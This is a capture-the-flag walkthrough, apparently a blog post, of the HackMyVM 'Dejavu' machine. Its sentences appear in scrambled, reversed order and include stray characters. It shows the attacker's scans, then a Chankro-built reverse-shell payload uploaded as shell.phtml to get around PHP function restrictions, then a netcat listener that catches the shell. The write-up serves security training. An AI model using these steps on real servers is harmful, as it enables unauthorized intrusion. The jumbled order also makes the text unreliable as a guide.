❯ nc -nlvp 9001īash: cannot set terminal process group (747): Inappropriate ioctl for device Now, we have to upload the output file and open the link. It creates a file that spawns a reverse shell. But we should notice that the document root is “/var/Document root ❯ python3 chankro.py -arch 64 -input rev.sh -output shell.phtml -path /var/www/html/.HowToEliminateTheTenMostCriticalInternetSecurityThreats/S3cR3t/files/ However, here, we can use the “mail” function because it’s allowed.įor the exploit, I created a simple reverse shell file. Please check the above links for the details. But the problem is that the project is not maintained for long and there is no python3 version of it. At this point, I am going to use a simple exploit with the tool Chankro. Since the functions to spawn shells are denied, we cannot directly spawn one. Now, the first hurdle is to identify the extension that allows script execution. The path “/S3cR3t” has a vulnerability that allows us to explore the directory contents. However, for now, the source of the page reveals a path. PHP Info shows some functions are restricted In that file, we see that some functions are disabled. This cursory scan exposed the presence of a PHP info file. ❯ gobuster -q dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u -o common.log The first page of the server only contains the Apache default server. Likewise, we have an HTTP port to enumerate further. The SSH banner shows that the operating system is Ubuntu 20.04 (Focal) ( ). Service Info: OS: Linux CPE: cpe:/o:linux:linux_kernel |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Not shown: 65533 closed tcp ports (conn-refused)Ģ2/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux protocol 2.0) Next, I scanned the services on the target that we can access from the network. Here, the IP address of the target is 10.0.0.152 whereas that of the attacker is 10.0.0.4 (not shown here). ❯ sudo netdiscover -r 10.0.0.0/24Ĥ Captured ARP Req/Rep packets, from 4 hosts. Link to the machine Step 1: Get the IP addressĪs always, I started the enumeration by identifying the IP address of the target machine. “Writeup – HackMyVM’s Dejavu Walkthrough” However, there are restrictions to certain functions making it difficult to get a reverse shell. ![]() Similarly, we also have a directory for the uploads. Then, we have a file upload area that misses an extension to filter out. First of all, we find a path from a page’s source. ![]() The machine includes basic vulnerabilities. Dejavu is an easy machine from HackMyVM by the user InfayerTS.
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |